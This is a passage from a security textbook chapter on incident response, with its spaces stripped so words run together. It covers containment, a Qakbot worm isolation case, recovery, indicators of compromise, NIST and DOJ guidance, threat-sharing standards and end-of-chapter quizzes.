acquireinformationthatmaybeusefulingainingaccesstocomputersystems,networks,orthephysicalfacilitiesthathousethem.Anybodyintheorganizationcanbethetargetofasocialengineeringattack,soallemployeesneedtoknowwhattobelookingforregardingthistypeofattack.Infact,thetargetmightnotevenbeoneofyourorganization’semployees—itcouldbeacontractor,suchassomebodyonthecustodialstaffornighttimesecuritystaff.Whateverthetypeofsecurityincidentsuspected,andnomatterwhosuspectsit,areportingprocedureneedstobeinplacefortheemployeestousewhenanincidentisdetected.Everybodyneedstoknowwhotocallshouldtheysuspectsomething,andeverybodyneedstoknowwhattodo.Acommontechniqueistodevelopareportingtemplatethatcanbesuppliedtoanindividualwhosuspectsanincident,so
thatthenecessaryinformationisgatheredinatimelymanner.
Detectingthatasecurityeventisoccurringorhasoccurredisnotnecessarilyaneasymatter.Incertainsituations,suchastheactivationofamaliciouspayloadforavirusorwormthatdeletescriticalfiles,itwillbeobviousthataneventhasoccurred.Inothersituations,suchaswhereanindividualhaspenetratedyoursystemandhasbeenslowlycopyingcriticalfileswithoutchangingordestroyinganything,theeventmaytakealotlongertodetect.Often,thefirstindicationthatasecurityeventhasoccurredmightbeauseroradministratornoticingthatsomethingis“funny”aboutthesystemoritsresponse.
InitialResponseAlthoughthereisnosuchthingasatypicalincident,foranyincidentthereisaseriesofquestionsthatcanbeansweredtoformaproperinitialresponse.Regardlessofthesource,thefollowingitemsareimportanttodetermineduringaninitialresponse:
Currenttimeanddate
Who/whatisreportingtheincident
Natureoftheincident
Whentheincidentoccurred
Hardware/softwareinvolved
Pointofcontactforinvolvedpersonnel
TechTip
InitialResponseErrorsMistakessuchasthesearecommonduringinitialresponse:
Failuretodocumentfindingsappropriately
Failuretonotifyorprovideaccurateinformationtodecision-makers
FailuretorecordandcontrolaccesstodigitalevidenceWaitingtoolongbeforereporting
Underestimatingthescopeofevidencethatmaybefound
Thepurposeofaninitialresponseistobegintheincidentresponseactionandplaceitonaproperpathwaytowardsuccess.Theinitialresponsemustsupportthegoalsoftheinformationsecurityprogram.Ifsomethingisverycritical,treatingitasroutinewouldbeamistake,sotriagewithrespecttoinformationcriticalityisimportant.Theinitialresponsemustalsobealignedwiththebusinesspracticesandobjectives.Triagewithrespecttocurrentbusinessimperativesandconditionsisimportant.Theinitialresponseactionsneedtobedesignedtocomplywithadministrativeandlegalpoliciesaswellastosupportdecisionswithregardtocivil,administrative,orcriminalinvestigations/actions.Forthesepurposes,maintainingaforensicallysoundprocessfromthebeginningisimportant.Itisalsoimportantthattheinformationisdeliveredaccuratelyandexpeditiouslytotheappropriatedecision-makerssothatfutureactionscanbetimely.Oneofthegreatesttoolstoachieveallofthesegoalsisasimpleandefficientprocess,soestablishingfewerstepsthatareclearandcleanispreferred.Complexityintheinitialresponseprocessonlyleadstoissueslaterbecauseofdelays,confusion,andincompleteinformation.
FirstResponderAcyberfirstrespondermustdoasmuchaspossibletocontroldamageorlossofevidence.Obviously,astimepasses,evidencecanbetamperedwithordestroyed.Lookaroundonthedesk,ontheRolodex,underthekeyboard,indesktopstorageareas,andoncubiclebulletinboardsforanyinformationthatmightberelevant.Securefloppydisks,opticaldiscs,flashmemorycards,USBdrives,tapes,andotherremovablemedia.Requestcopiesoflogsassoonaspossible.MostISPswillprotectlogsthatcouldbesubpoenaed.Takephotos(somelocalitiesrequireuseofPolaroid
photos,astheyaremoredifficulttomodifywithoutobvioustampering)orvideo.Includephotosofoperatingcomputerscreensandhardwarecomponentsfrommultipleangles.Besuretophotographinternalcomponentsbeforeremovingthemforanalysis.Thefirstrespondercandomuchtopreventdamage,orcancausesignificantlossbydigitallyalteringevidence,eveninadvertently.Collectingdatashouldbedoneinaforensicallysoundnature(seeChapter23fordetails),andbesuretopayattentiontorecordingtimevaluessotimeoffsetscanbecalculated.
TechTip
CommonTechnicalErrorsCommontechnicalmistakesduringinitialresponseinclude:
Alteringtime/datestampsonevidencesystems“Killing”rogueprocesses
PatchingthesystemNotrecordingthestepstakenonthesystem
Notactingpassively
IncidentIsolationOnceanincidentisdiscoveredandcharacterized,themostimportantstepintheincidentresponseprocessinvolvestheisolationoftheproblem.Manyincidentscanspreadtoothermachinesandexpandthedamagefootprintifnotcontainedbytheincidentresponseteam.Whenaparticularmachineorservicebecomescompromised,theteamcaninvokethepreplannedstepstoisolatetheinfectedunitfromothers.Thismayhaveanimpactonperformance,butitwillstillbelessthanifthecompromiseisallowedtospreadandmoremachinesbecomecompromised.
ContainmentandEradication
Oncetheincidentresponseteamhasdeterminedthatanincidentmostlikelyhasoccurred,itmustattempttoquicklycontaintheproblem.Atthispoint,orverysoonaftercontainmentbegins,dependingontheseverityoftheincident,managementneedstodecidewhethertheorganizationintendstoprosecutetheindividualwhohascausedtheincident(inwhichcasecollectionandpreservationofevidenceisnecessary),orsimplywantstorestoreoperationsasquicklyaspossiblewithoutregardtopossiblydestroyingevidence.Incertaincircumstances,managementmightnothaveachoice,suchasifspecificregulationsorlawsrequireittoreportparticularincidents.Ifmanagementmakesthedecisiontoprosecute,specificproceduresneedtobefollowedinhandlingpotentialevidence.Individualstrainedinforensicsshouldbeusedinthiscase.Theincidentresponseteammustdecidehowtoaddresscontainmentas
soonasithasdeterminedthatanactualincidenthasoccurred.Ifanintruderisstillconnectedtotheorganization’ssystem,oneresponseistodisconnectfromtheInternetuntilthesystemcanberestoredandvulnerabilitiescanbepatched.This,however,meansthatyourorganizationisnotaccessibletocustomersovertheInternetduringthattime,whichmayresultinlostrevenue.Anotherresponsemightbetostayconnectedandattempttodeterminetheoriginoftheintruder.Adecisionwillneedtobemadeastowhichismoreimportantforyourorganization.Yourincidentresponsepolicyshouldidentifywhoisauthorizedtomakethisdecision.Otherpossiblecontainmentactivitiesmightincludeaddingfiltering
rulesormodifyingexistingrulesonfirewalls,routers,andintrusiondetectionsystems,updatingantivirussoftware,andremovingspecificpiecesofhardwareorhaltingspecificsoftwareapplications.Ifanintruderhasgainedaccessthroughaspecificaccount,disablingorremovingthataccountmayalsobenecessary.
QakbotWormIsolationThefollowingaresummarynotesmadebyafirmthatwashitbytheQakbotworm.Considerhowyourincidentresponseprocesswouldrespondtothisscenario.
Laptopinfectedwhileoffnetwork
WhenrejoinedcompanynetworkSpreadtoopennetworkdriveswithinminutes
Spreadtoagroupofcomputerswithin60minutesusingacommonadministratorcredential
Infectionidentifiedbyserverantivirusdetectingdroppedfiles
MalwareanalysisidentifiedcommandandcontrolconnectionsIdentifiedadditionalinfectedsystemsfromnetworklogs
Couldnotimmediatelytakeinfectedcomputersoutofservicebecausetheywerebeingusedinacriticalfunction
Computerswerealsogeographicallydispersed
Hadtoisolateaportionofthenetwork(whilestillallowingcriticaldataflows)whileremediatingonecomputeratatimeduringamaintenancewindow
Oncetheimmediateproblemshavebeencontained,theincidentresponseteamneedstoaddressthecauseoftheincident.Iftheincidentistheresultofavulnerabilitythatwasnotpatched,thepatchmustbeobtained,tested,andapplied.Accountsmayneedtobedisabledorpasswordsmayneedtobechanged.Completereloadingoftheoperatingsystemmightbenecessaryiftheintruderhasbeeninthesystemforanunknownlengthoftimeorhasmodifiedsystemfiles.Determiningwhenanintruderfirstgainedaccesstoyoursystemornetworkiscriticalindetermininghowfarbacktogoinrestoringthesystemornetwork.
QuarantineOnemethodofisolatingamachineisthroughaquarantineprocess.Quarantineisaprocessofisolatinganobjectfromitssurroundings,preventingnormalaccessmethods.Themachinemaybeallowedtorun,butitsconnectiontoothermachinesisbrokeninamannertopreventthespreadofinfection.Quarantinecanbeaccomplishedthroughavarietyofmechanisms,includingtheerectionoffirewallsrestrictingcommunicationbetweenmachines.Thiscanbeafairlycomplexprocess,butifproperlyconfiguredinadvance,thelimitationsofthequarantineoperationcan
allowthemachinetocontinuetorunfordiagnosticpurposes,evenifitnolongerprocessesaworkload.
DeviceRemovalAmoreextremeresponseisdeviceremoval.Intheeventthatamachinebecomescompromised,itissimplyremovedfromproductionandreplaced.Whendeviceremovalentailsthephysicalchangeofhardware,thisisaresource-intensiveoperation.Thereimagingofamachinecanbeatime-consuminganddifficultendeavor.Theadventofvirtualmachineschangesthisentirely,astheprovisioningofvirtualimagesonhardwarecanbeaccomplishedinamuchquickerfashion.
EscalationandNotificationOnekeydecisionpointininitialresponseisthatofescalation.Whenathresholdofinformationbecomesknowntoanoperatorandtheoperatordecidestoescalatethesituation,theincidentresponseprocessmovestoanotificationandescalationphase.Notallincidentsareofthesameriskprofile,andincidentresponseeffortsshouldmaptotheactualrisklevelassociatedwiththeincident.Whentheincidentresponseteamisnotifiedofapotentialincident,itsfirststepsaretoconfirmtheexistence,scope,andmagnitudeoftheeventandthenrespondaccordingly.Thisistypicallydonethroughatwo-stepescalationprocess,whereaminimalquick-responseteambeginsandthenaddsmembersasnecessitatedbytheissue.Makinganassessmentoftheriskassociatedwithanincidentisan
importantfirststep.Ifthecharacteristicsofanincidentincludealargenumberofpacketsdestinedfordifferentservicesonamachine(anattackcommonlyreferredtoasaportscan),thentheactionsneededaredifferentthanthoseneededtorespondtoalargenumberofpacketsdestinedtoasinglemachineservice.Portscansarecommon,andtoadegreerelativelyharmless,whileportfloodingcanresultindenialofservice.Makingadeterminationofthespecificdownstreamrisksisimportantinprioritizingresponseactions.
StrategyFormulationTheresponsetoanincidentwillbehighlydependentupontheparticularcircumstancesoftheintrusion.Therearemanypathsonecantakeinthestepsassociatedwithanincident;thechallengeisinchoosingthebeststepsineachcase.Duringthepreparationstage,awiderangeofscenarioscanbeexamined,allowingtimetoformulatestrategies.Evenafteranincidentresponseteamhasplannedaseriesofstrategiestorespondtovariousscenarios,determininghowtoemploythosepreplannedstrategiestopropereffectstilldependsonthecircumstancesofaparticularincident.Avarietyoffactorsshouldbeconsideredintheplanninganddeploymentofstrategies,including,butnotlimitedto,thefollowing:
Howcriticalaretheimpactedsystems?
Howsensitiveisthedata?
Whatisthepotentialoveralldollarlossinvolved/rateofloss?
Howmuchdowntimecanbetolerated?
Whoaretheperpetrators?
Whatistheskillleveloftheattacker?
Doestheincidenthaveadversepublicitypotential?
Thesepiecesofinformationprovideboundariesfortheupcominginvestigations.Therearestillnumerousissuesthatneedtobedeterminedwithrespecttotheupcominginvestigation.Addressingtheseissueshelpsprovidefocalpointsduringtheinvestigation:
Restorenormaloperations
Offlinerecovery?
Onlinerecovery?
Determinepublicrelationsplay
“Tospinornottospin?”
Determineprobableattacker
Internal:handleinternallyorprosecute?
External:prosecute?
Involvelawenforcement?
Determinetypeofattack
DoS,theft,vandalism,policyviolation?
Ongoingintrusion?
Pivoting?
Classifyvictimsystem
Criticalserver/application?
Numberofusers?
Whatothersystemsareaffected?
TechTip
InvestigationBestPracticeThefirstruleofincidentresponseinvestigationsis“Donoharm.”Iftheinvestigationitselfcausesissuesforthebusiness,howisthisdifferentfromabusinessperspectivethantheoriginalattackvector?Infact,inadvancedthreats,theattackerstakegreatcarenottoimpactthesystemorbusinessoperationsinanywaythatcouldleadtotheirdiscovery.Itisimportantfortheresponseteamtoexerciseextremecautionandtodonoharm,lesttheymakefutureinvestigationsimpracticalordeemedtobenotworthpursuing.
Usingtheanswerstothesequestionshelpstheteamdeterminethenecessarystepsintheupcominginvestigationphase.Althoughitisimpossibletoaccountforallcircumstances,thislevelofstrategycangreatlyassistinscopingtheworkaheadduringtheinvestigationphase.
InvestigationThetrueinvestigationphaseofanincidentisamultistep,multipartyevent.Withtheexceptionofverysimpleevents,mostincidentswillinvolvemultiplemachinesandpotentiallyimpactthebusinessinmultipleways.Theprimaryobjectiveoftheinvestigativephaseistomakethe
followingdeterminations:
Whathappened
Whatsystemsareaffected
Whatwascompromised
Whatwasthevulnerability
Whodidit(ifpossibletodetermine)
Whataretherecovery/remediationoptions
Lookingatthelist,itisdaunting,butthisiswheretherealworkofincidentresponseoccurs.Itwilltakeateameffort,partlybecauseofworkload,partlybecauseofspecializedskills,andpartlybecausetheentireeffortisbeingperformedinaraceagainsttime.
DuplicationDuplicationofdrivesisacommonforensicsprocess.Itisimportanttohaveaccuratecopiesandproperhashvaluessothatanyanalysisisperformedunderproperconditions.Properdiskduplicationisnecessarytoensurealldata,includingmetadata,isproperlycapturedandanalyzedaspartoftheoverallprocess.
NetworkMonitoringTomonitornetworkflowdata,includingwhoistalkingtowhom,onesourceofinformationisNetFlowdata.NetFlowisaprotocol/standardforthecollectionofnetworkmetadataontheflowsofnetworktraffic.
NetFlowisnowanIETFstandard,andallowsforunidirectionalcapturesofcommunicationmetadata.NetFlowcanidentifybothcommonanduniquedataflows,andinthecaseofincidentresponse,typicallythenewanduniqueNetFlowpatternsareofmostinteresttoincidentresponders.
TechTip
NetFlowDataAflowisunidirectional,sobidirectionalflowwouldberecordedastwoseparateflows.NetFlowdataisdefinedbysevenuniquekeys:
1.SourceIPaddress2.DestinationIPaddress3.Sourceport4.Destinationport5.Layer3protocol6.TOSbyte(DSCP)7.Inputinterface(ifIndex)
Recovery/ReconstitutionProceduresRecoveryisanimportantstepinallincidents.Oneofthefirstrulesistonottrustasystemthathasbeencompromised,andthisincludesallaspectsofanoperatingsystem.Whetherthereisknowndestructionornot,thesafepathisonewheretherecoverystepincludesreconstructionofaffectedmachines.Recoveryeffortsfromanincidentinvolveseveralspecificelements.First,thecauseoftheincidentneedstobedeterminedandresolved.Thisisdonethroughanincidentresponsemechanism.Attemptingtorecoverbeforethecauseisknownandcorrectedwillcommonlyresultinacontinuationoftheproblem.Second,thedata,ifsensitiveandsubjecttomisuse,needstobeexaminedinthecontextofhowitwaslost,whowouldhaveaccess,andwhatbusinessmeasuresneedtobetakentomitigatespecificbusinessdamageasaresultoftherelease.Thismayinvolvethechangingofbusinessplansifthereleasemakesthem
suspectorsubjecttoadverseimpacts.Akeyaspectinmanyincidentsisthatofexternalcommunications.
Havingacommunicationsexpertwhoisfamiliarwithdealingwiththepressandhasthelanguagenuancesnecessarytoconveythecorrectinformationandnotinflamethesituationisessentialtothesuccessofanycommunicationplan.Manyfirmsattempttousetheirlegalcounselforthis,butgenerallyspeaking,thelegallypreciselanguageusedbyanattorneyisnotusefulfromaPRstandpoint,andamorenuancedcommunicatormayprovideabetterimage.Inmanycasesofcrisismanagement,itisnotthecrisisthatdeterminesthefinalcosts,butthereactiontoandcommunicationofdetailsaftertheinitialcrisis.Recoverycanbeatwo-stepprocess.First,theessentialbusiness
functionscanberecovered,enablingbusinessoperationstoresume.Thesecondstepisthecompleterestorationofallservicesandoperations.Becauseofthedifficultyanduncertaintyinvolvedinrepairingsystems,mostbestpracticestodayinvolvereconstitutingtheunderlyingsystemandthentransferringtheoperationaldata.Stagingtherecoveryoperationsinaprioritizedfashionallowsagracefulreturntoanoperatingcondition.Restorationcanbedoneinawidevarietyofways.Formanysystems,
thereconstitutionofacleanoperatingsystemcanrestoreasystem.Thistypeofrestorationrequiresasignificantamountofpreparation.Havingacleanversionofeachofyourassetsprovidesforthistypeofrestorationeffort.Recoverysoundssimple,butinlarge-scaleincidents,thenumberofmachinescanbesignificant.Addtothisthechanceofreinfectionasmachinesarerestored.Thismeansthatsimplyreplacingthemachinewithacleanmachineisnotsufficient,butratherthereplacementneedsprotectionagainstreinfection.Theotherchallengeinlarge-scalerecoveryeventsisthesequencingof
theeffort.Whentherearemanymachinestoberestored,andtherestorationprocesstakestimeandresources,schedulingisessential.Settingupaprioritizedscheduleisoneofthestepsthatneedstobeconsideredintheplanningprocess.Thetimetodothistypeofplanningisbeforethehecticpaceofanincidentoccurs.
ReportingAfterthesystemhasbeenrestored,theincidentresponseteamcreatesareportoftheincident.Detailingwhatwasdiscovered,howitwasdiscovered,whatwasdone,andtheresults,thisreportactsasacorporatememoryandcanbeusedforfutureincidents.Havingaknowledgebaseofpreviousincidentsandtheactionsusedisavaluableresourcebecauseitisinthecontextoftheparticularenterprise.Thesereportsalsoallowamechanismtoclosetheloopwithmanagementovertheincidentand,mostimportantly,providearoadmapoftheactionsthatcanbeusedinthefuturetopreventeventsofidenticalorsimilarnature.Partofthereportwillberecommendations,ifappropriate,tochange
existingpoliciesandprocedures,includingdisasterrecoveryandbusinesscontinuity.Thesimilarityinobjectivesmakesanaturaloverlap,andthecross-pollinationbetweentheseoperationsisimportanttomakeallprocessesasefficientaspossible.
Follow-up/LessonsLearnedOncetheexcitementoftheincidentisoverandoperationshavebeenrestoredtotheirpre-incidentstate,itistimetotakecareofafewlastitems.Senior-levelmanagementmustbeinformedaboutwhatoccurredandwhatwasdonetoaddressit.Anafter-actionreportshouldbecreatedtooutlinewhathappenedandhowitwasaddressed.Recommendationsforimprovingprocessesandpoliciesshouldbeincorporatedsothatarepeatincidentwillnotoccur.Ifprosecutionoftheindividualresponsibleisdesired,additionaltimewillbespenthelpinglawenforcementagenciesandpossiblytestifyingincourt.Trainingmaterialmayalsoneedtobedevelopedormodifiedaspartofthenew,modifiedpoliciesandprocedures.Inthereportingprocess,acriticalassessmentofwhatwentright,what
wentwrong,whatcanbeimproved,andwhatshouldbecontinuedispreparedasaformoflessonslearned.Thisisacriticalpartofself-
improvement,andisnotmeanttoplaceblame,butrathertoassistinfutureprevention.Havingthingsgowronginacomplexenvironmentispartofnormaloperations;havingrepeatfailuresthatarepreventableisnot.Thekeytothelessonslearnedsectionofthereportistomakethenecessarychangessothatarepeateventwillnotoccur.Becausemanyincidentsarearesultofattackersusingknownmethods,oncetheattackpatternsareknowninanenterpriseandmethodsexisttomitigatethem,thenitisthetaskoftheentireenterprisetotakethenecessaryactionstomitigatefutureevents.
StandardsandBestPracticesTherearemanyoptionsavailabletoateamwhenplanningandperformingprocessesandprocedures.Toassisttheteaminchoosingapath,therearebothstandardsandbestpracticestoconsultintheproperdevelopmentofprocesses.Fromgovernmentsourcestoindustrysources,therearemanyopportunitiestogatherideasandmethods,evenfromfellowfirms.
StateofCompromiseThenewstandardofinformationsecurityinvolveslivinginastateofcompromise,whereoneshouldalwaysexpectthatadversariesareactiveintheirnetworks.Itisunrealistictoexpectthatyoucankeepattackersoutofyournetwork.Operatinginastateofcompromisedoesnotmeanthatonemustsuffersignificantlosses.Aworkingassumptionwhenplanningfor,respondingto,andmanagingtheoverallincidentresponseprocessisthatthesystemsarecompromisedandthatpreventioncannotbetheonlymeansofdefense.
NISTTheNationalInstitutesofStandardsandTechnology,aU.S.governmentalentityundertheDepartmentofCommerce,producesawiderangeof
SpecialPublications(SPs)intheareaofcomputersecurity.Groupedinseveraldifferentcategories,themostrelevantSPsforincidentresponsecomefromtheSpecialPublications800series:
ComputerSecurityIncidentHandlingGuide,SP800-61Rev.2NISTSecurityContentAutomationProtocol(SCAP),SP800-126Rev2
InformationSecurityContinuousMonitoringforFederalInformationSystemsandOrganizations,SP800-137
GuidetoSelectingInformationTechnologySecurityProducts,NISTSP800-36
GuidetoEnterprisePatchManagementTechnologies,NISTSP800-40Version3
GuidetoUsingVulnerabilityNamingSchemes[CVE/CCE],NISTSP800-51,Rev.1
DepartmentofJustice
TechTip
WhatNottoDoasPartofIncidentResponseTheU.S.DepartmentofJusticehastwospecificrecommendedstepsthatyoushouldnottakeaspartofanincidentresponseaction.
Donotusethecompromisedsystemtocommunicate.Donothackintoordamageanothernetworkorsystem.
Thevictimorganizationshouldalwaysassumethatanycommunicationsacrossaffectedmachineswillbecompromised.Thiseavesdroppingactionisstandardhackerbehavior,andifyoutipoffyouractions,theycanbecounteredbeforeyouregaincontrolofyoursystem.Hacking,evenretaliatoryhacking,isillegal,andgiventhedifficultyinattribution,attemptstorespondbyhackingthehackermayaccidentlyresultinhackinganinnocentthird-partymachine.
InApril2015,theU.S.DepartmentofJustice’sCybersecurityUnitreleasedabestpracticesdocument,BestPracticesforVictimResponseandReportingofCyberIncidents.Thisdocumentidentifiesstepstotakebeforeacyberincident,thestepstotakeduringanincidentresponseaction,alistofactionstonottake,andwhattodoaftertheincident.TheURLforthedocumentisinthe“ForMoreInformation”sectionattheendofthechapter.
IndicatorsofCompromiseIndicatorsofCompromise(IOCs)areartifactsleftbehindfromcomputerintrusionactivity.DetectionofIOCsisaquickwaytojumpstartaresponseelement.OriginatedbythesecurityfirmMandiant,IOCshavespreadinusagetoawiderangeoffirms.IOCsactasatripwireforresponders.AnIOCcanbetiedtoaspecificobservableevent,whichthencanbetracedtorelatedevents,andtostatefuleventssuchasRegistrykeys.Oneofthebiggestchallengesinincidentresponseisgettingonthetrailofanattacker,andIOCsprovideameansofgettingonthetrail.
TechTip
CommonIndicatorsofCompromise
UnusualoutboundtrafficThisprobablyistheclearestindicatorthatdataisgoingwhereitshouldn’t.
GeographicalirregularitiesCommunicationsgoingtocountriesinwhichnobusinesstiesexistisanotherkeyindicatorthatdataisgoingwhereitshouldn’t.
UnusualloginactivityFailedlogins,loginfailurestononexistentaccounts,andsoforth,indicatecompromise.
AnomaloususagepatternsforprivilegedaccountsChangesinpatternsofwhenadministratorstypicallyoperateandwhattheytypicallyaccessindicatecompromise.
ChangesindatabaseaccesspatternsThisindicateshackersaresearchingfordata,orreadingittocollectlargequantities.
AutomatedwebtrafficTimingcanshowsomerequestsarescripts,nothumans.
ChangeinHTMLresponsesizesSQLinjectioncanresultinlargeHTMLresponsesizes.
LargenumbersofrequestsforspecificfilesNumerousrequestsforspecificfiles,suchasjoin.php,mayindicateautomatedattackpatterns.
MismatchedporttoapplicationtrafficCommonmethodofattemptingtohideactivity.UnusualDNSrequestsCommandandcontrolservertraffic.
UnusualRegistrychangesIndicationsofchangestoasystemstate.UnexpectedpatchingSomehackers/malwarewillpatchtopreventotherhackersfromenteringatarget.
Bundlesofdata/filesinwrongplaceLargeaggregationsofdata,frequentlyencrypted,maybefilesbeingpreparedforexfiltration.
ChangestomobiledeviceprofilesMobileisthenewperimeter,andchangesmayindicatemalware.
DDoS/DoSattacksDenialofserviceisusedasatooltoprovidesmokescreenordistraction.
ThereareseveralstandardsassociatedwithIOCs,butthethreemainonesareCyberObservableeXpression(CybOX),amethodofinformationsharingdevelopedbyMITRE;OpenIOC,anopensourceinitiativeestablishedbyMandiantthatisdesignedtofacilitaterapidcommunicationofspecificthreatinformationassociatedwithknownthreats;andtheIncidentObjectDescriptionExchangeFormat(IODEF),anXMLformatspecifiedinRFC5070forconveyingincidentinformationbetweenresponseteams,bothinternallyandexternallywithrespecttoorganizations.The“ForMoreInformation”sectionattheendofthechapterprovidesURLsforallthreestandards.
CyberKillChainAmoderncyberattackisacomplex,multistageprocess.Theconceptofakillchainisthetargetingofspecificstepsofamultistepprocesswiththegoalofdisruptingtheoverallprocess.Thetermcyberkillchainistheapplicationofthisphilosophytoacyberincident,withtheexpressed
purposeofdisruptingtheattack.Takingtheinformationalreadypresented,weknowthestepsthat
hackerstakeandwehaveindicatorsthatcanclueusintothecurrentstatusofanattack.Usingthisinformation,wecanplanspecificinterventionstoeachstepoftheattacker’sprocess.ThekillchainprocesshasreceivedalotofpresssinceitwasintroducedbyLockheedMartin,somepositiveandsomenegative.Inmostcases,thenegativepressisrelatedtowhatmanywouldcallamisapplicationofthemodel.Aswithallsecuritymodelsanddefensivestrategies,itisimportanttocustomizeandadapthowitinteractswiththespecificprocessesitismeanttoprotect.
MakingSecurityMeasurableMITRE,workingtogetherwithpartnersfromgovernment,industry,andacademia,hascreatedasetoftechniques(calledMakingSecurityMeasurable)toimprovethemeasurabilityofsecurity.Thisisacomprehensiveeffort,includingregistriesofspecificbaselinedata,standardizedlanguagesfortheaccuratecommunicationofsecurityinformation,andformatsandstandardizedprocessestofacilitateaccurateandtimelycommunications.Theentiretyoftheprojectisbeyondthescopeofthistext,butTable
22.1listssomeofthecommonitemsbycategory,afewofwhicharedescribednextinabitmoredetail.
Table22.1 SampleElementsofMakingSecurityMeasurable
STIXandTAXII
MITREhascontinueditseffortsintheprocessofmakingsecuritymeasurableandaddingautomationtothemix.StructuredThreatInformationeXpression(STIX)isastructuredlanguageforcyberthreatintelligenceinformation.MITREcreatedTrustedAutomatedeXchangeofIndicatorInformation(TAXII)asthemaintransportmechanismforcyberthreatinformationrepresentedbySTIX.TAXIIservicesalloworganizationstosharecyberthreatinformationinasecureandautomatedmanner.
CybOXCyberObservableeXpression(CybOX)isastandardizedschemaforthecommunicationofobserveddatafromtheoperationaldomain.Designedtostreamlinecommunicationsassociatedwithincidents,CybOXprovidesameansofcommunicatingkeyelements,includingeventmanagement,incidentmanagement,andmore,inanefforttoimproveinteroperability,consistency,andefficiency.
Chapter22Review
ForMoreInformationCybOXhttps://cybox.mitre.org/DOJBestPracticesforVictimResponseandReportingofCyberIncidentswww.justice.gov/sites/default/files/criminal-ccips/legacy/2015/04/30/04272015reporting-cyber-incidents-final.pdf
IncidentObjectDescriptionExchangeFormat(IODEF)https://tools.ietf.org/html/rfc5070
MakingSecurityMeasurablehttp://makingsecuritymeasurable.mitre.org/
OpenIOCFrameworkwww.openioc.org/
ChapterSummaryAfterreadingthischapterandcompletingtheexercises,youshouldunderstandthefollowingaboutincidentresponse.
Understandthefoundationsofincidentresponseprocesses
Theroleofincidentmanagementisthecontrolofacoordinatedandcomprehensiveresponsetoanincident.
Learntheanatomyofanattack,botholdversionsandnewerAPT-styleattacks.
Thegoalsofincidentresponseinanorganizationaretorestoresystemstofunctioningorderandpreventfuturerisk.
Implementthedetailedstepsofanincidentresponseprocess
Themajorstepsintheincidentresponseprocessarepreparation,incidentidentification,initialresponse,incidentisolation,strategyformulation,investigation,recovery,reporting,andfollow-up.
Developadetailedunderstandingofthecomponentsofeachofthesteps.
Understandthelinkagesandinterconnectionsbetweenkeyprocesssteps.
Describestandardsandbestpracticesthatareinvolvedinincidentresponse
Modernsystemsshouldexpecttoexistinastateofcompromiseandhavepoliciesandprocessesdesignedtooperateundertheseconditions.
TheU.S.government,includingNISTandtheDepartmentofJustice,havepublishedusefulguidance.
Indicatorsofcompromiseprovideearly-warningtriggersforincidentresponseinvestigators.
Takingactionsagainstanincidentinprogresscanbeplannedusingacyberkillchainphilosophy.
TheMakingSecurityMeasurablematerialfromMITREcanassistintheincidentresponseprocess.
KeyTermsadvancedpersistentthreat(APT)(653)ComputerEmergencyResponseTeam(CERT)(651)ComputerIncidentResponseTeam(CIRT)(651)cyberkillchain(669)CyberObservableeXpression(CybOX)(669)dataminimization(658)footprinting(652)incident(651)incidentresponse(651)incidentresponsepolicy(655)IndicatorofCompromise(IOC)(668)informationcriticality(651)quarantine(662)remoteadministrationTrojan(RAT)(653)StructuredThreatInformationeXpression(STIX)(669)TrustedAutomatedeXchangeofIndicatorInformation(TAXII)(669)
KeyTermsQuizUsetermsfromtheKeyTermslisttocompletethesentencesthatfollow.Don’tusethesametermmorethanonce.Notalltermswillbeused.
1.A(n)_______________isanyeventinaninformationsystemornetworkwheretheresultsaredifferentthannormal.
2.Whentheattackersarefocusedonmaintainingapresenceduringanincident,thetypeofattackistypicallycalleda(n)_______________.
3.Thedeterminationofboundariesduringanattackisaprocesscalled_______________.
4.Thestepsanorganizationperformsinresponsetoanysituationdeterminedtobeabnormalintheoperationofacomputersystemarecalled_______________.
5.Onemethodologyforplanningincidentresponsedefensesisknownas_______________.
6.A(n)_______________isanartifactthatcanbeusedtodetectthepresenceofanattack.
7.Toremoveanitemfromnormaloperationanduseisaprocessreferredtoas_______________.
8.A(n)_______________isateam-basedapproachtoincidentresponseinanorganization.
9.Akeymeasureusedtoprioritizeincidentresponseactionsis________________.
10._______________and_______________areusedtocommunicatecyberthreatinformationbetweenorganizations.
Multiple-ChoiceQuiz1.WhichofthefollowingisnotanIndicatorofCompromise(IOC)?
A.Unusualoutboundtraffic
B.Increaseintrafficoverport80
C.TraffictounusualforeignIPaddresses
D.Discoveryoflargeencrypteddatablocksthatyoudon’tknowthepurposeof
2.Asysadminthinksamachineisunderattack,sohelogsinasrootandattemptstoseewhatishappeningonthemachine.Whichcommontechnicalmistakeismostlikelytooccur?
A.Thealterationofdate/timestampsonfilesandobjectsinthesystem
B.FailuretorecognizetheattackerbyprocessID
C.Erasureoflogsassociatedwithanattack
D.Thecuttingofanetworkconnectionbetweenanattackerandthecurrentmachine
3.Whatisthelaststepoftheincidentresponseprocess?A.Reconstitution
B.Recovery
C.Follow-up
D.Lessonslearned
4.Whichofthefollowingarecriticalelementsinanincidentresponsetoolkit?(Chooseallthatapply.)
A.Accuratenetworkdiagram
B.Findingsoflastpenetrationtestreport
C.Listofcriticaldata/systems
D.Phonelistofpeopleon-callbyarea
5.YourorganizationexperiencedanAPThackinthepastandisveryinterestedinpreventingareoccurrence.Whatstepoftheattackpath
isthebeststepatwhichtocombatAPT-styleattacks?
A.Escalateprivilege
B.Establishfoothold
C.Lateralmovement
D.Initialcompromise
6.Thegoalsofanincidentresponseprocessincludeallofthefollowingexcept:
A.Confirmordispelanincidentoccurrence
B.Minimizesecurityexpenditures
C.Protectprivacyrights
D.Minimizesystemdisruption
7.Duringaninitialresponsetoanincident,whichofthefollowingismostimportant?
A.Whoorwhatisreportingtheincident
B.Thetimeofthereport
C.Whotakestheinitialreport
D.Accurateinformation
8.Whendeterminingthelevelofriskofexposurefordatainstorage,intransit,orduringprocessing,whichofthefollowingisnotafactor?
A.Time
B.Quantity
C.Datatype
D.Access
9.Whileworkingonaninvestigation,acolleaguehandsyoualistoffilecreationandaccesstimestakenfromacompromisedworkstation.Tomatchthetimeswithfileaccessandcreationtimesfromothersystems,whatdoyouneedtoaccountfor?
A.Recordtimeoffsets
B.NetworkTimeProtocol
C.Created,modified,andaccessedtimes
D.Operatingsystemoffsets
10.WhichofthefollowingactivitiesshouldyounotdoduringanincidentresponseinvestigationassociatedwithanAPT?
A.Usethecorporatee-mailsystemtocommunicate
B.Determinesystemtimeoffsets
C.Useonlyqualifiedandtrustedtools
D.Createanoff-networksitefordatacollection
EssayQuiz1.TheChiefFinancialOfficer(CFO)seesyouinthelunchroom.
